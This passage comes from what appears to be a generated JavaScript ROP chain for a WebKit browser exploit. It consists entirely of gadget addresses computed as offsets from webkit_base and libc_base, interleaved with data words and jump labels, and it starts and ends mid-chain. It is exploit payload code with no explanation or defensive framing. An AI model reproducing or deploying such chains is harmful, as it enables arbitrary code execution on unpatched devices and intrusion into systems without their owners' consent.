webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1695:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1697:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+130984, //L1700
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+130968, //L1698
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1698:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1700:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+131096, //L1701
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+131144, //L1704
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+131112, //L1702
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1701:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1702:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1703:
db([12, 0]); // 0xc
set_gadget(libc_base+759608,); //pop rax
//L1704:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+131248, //L1707
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+131232, //L1705
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1705:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1707:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+131424, //L1710
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+131440, //L1711
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+131392, //L1708
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+131408, //L1709
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1708:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1709:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1710:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1711:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+131552, //L1714
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+131520, //L1712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1712:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1713:
db([4294967295, 4294967295]); // -0x1
set_gadget(libc_base+759608,); //pop rax
//L1714:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+131640, //L1715
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1715:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1717:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+131760, //L1720
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+131744, //L1718
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1718:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1720:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+131848, //L1721
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+131864, //L1723
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L1721:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1723:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+131920, //L1724
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1724:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1726:
db([12, 0]); // 0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+132104, //L1728
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+132120, //L1729
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+132088, //L1727
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1727:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1728:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1729:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+132232, //L1730
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+132264, //L1732
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+132248, //L1731
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1730:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1731:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1732:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+2115150, //setle al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+132440, //L1734
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+132456, //L1735
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+132424, //L1733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1733:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1734:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1735:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+132616, //L1740
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+132632, //L1741
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+132568, //L1737
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1737:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1738:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L1739:
db([1, 0]); // 0x1
set_gadget(webkit_base+3236123,); //pop r9
//L1740:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1741:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+132752, //L1742+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+132744, //L1742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L1742:
db([0, 0]); // 0x0
set_gadgets([
ropchain+132768, //L1742+24
ropchain+137032, //L1736
libc_base+764760, //pop rsi
ropchain+132808, //L1743
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1743:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1745:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+132928, //L1748
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+132912, //L1746
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1746:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1748:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+133040, //L1749
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+133088, //L1752
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+133056, //L1750
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1749:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1750:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1751:
db([36, 0]); // 0x24
set_gadget(libc_base+759608,); //pop rax
//L1752:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+133192, //L1755
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+133176, //L1753
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1753:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1755:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+133368, //L1758
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+133384, //L1759
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+133336, //L1756
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+133352, //L1757
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1756:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1757:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1758:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1759:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+133464, //L1760
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+133480, //L1761
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1760:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1761:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+133576, //L1763
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+133560, //L1762
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1762:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1763:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+133656, //L1764
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1764:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1766:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+133776, //L1769
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+133760, //L1767
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1767:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1769:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+133888, //L1770
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+133936, //L1773
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+133904, //L1771
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1770:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1771:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1772:
db([12, 0]); // 0xc
set_gadget(libc_base+759608,); //pop rax
//L1773:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+134040, //L1776
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+134024, //L1774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1774:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1776:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+134216, //L1779
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+134232, //L1780
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+134184, //L1777
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+134200, //L1778
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1777:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1778:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1779:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1780:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+134312, //L1781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+134328, //L1782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1781:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1782:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+134440, //L1783
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+134472, //L1785
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+134456, //L1784
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1783:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1784:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1785:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+2115150, //setle al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+134648, //L1787
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+134664, //L1788
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+134632, //L1786
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1786:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1787:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1788:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+134824, //L1793
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+134840, //L1794
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+134776, //L1790
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1790:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1791:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L1792:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1793:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1794:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+134952, //L1795+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+134944, //L1795
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L1795:
db([0, 0]); // 0x0
set_gadgets([
ropchain+134968, //L1795+24
ropchain+136656, //L1789
libc_base+764760, //pop rsi
ropchain+135008, //L1796
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1796:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1798:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+135128, //L1801
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+135112, //L1799
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1799:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1801:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+135304, //L1804
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+135320, //L1805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+135272, //L1802
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+135288, //L1803
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1802:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1803:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1804:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1805:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+135400, //L1806
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+135416, //L1807
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1806:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1807:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+135576, //L1811
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+135544, //L1809
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+135560, //L1810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1808:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L1809:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1810:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1811:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+135632, //L1813
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L1813:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+135760, //L1815
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+135776, //L1816
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+135744, //L1814
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1814:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1815:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1816:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+135856, //L1817
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+135872, //L1818
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1817:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1818:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+135968, //L1820
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+135952, //L1819
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1819:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1820:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+136048, //L1821
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1821:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1822:
db([10, 0]); // 0xa
set_gadget(libc_base+144605,); //pop rdi
//L1823:
db([10, 0]); // 0xa
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+136192, //L1824
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+136224, //L1826
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+136208, //L1825
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1824:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1825:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1826:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+136400, //L1828
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+136416, //L1829
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+136384, //L1827
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1827:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1828:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1829:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+136560, //L1832
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+136576, //L1833
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+136528, //L1830
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1830:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1831:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L1832:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1833:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+136648, //L1834
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1834:
db([0, 0]); // 0x0
//L1789:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+136776, //L1837
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+136792, //L1838
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+136760, //L1836
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1836:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1837:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1838:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+136936, //L1841
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+136952, //L1842
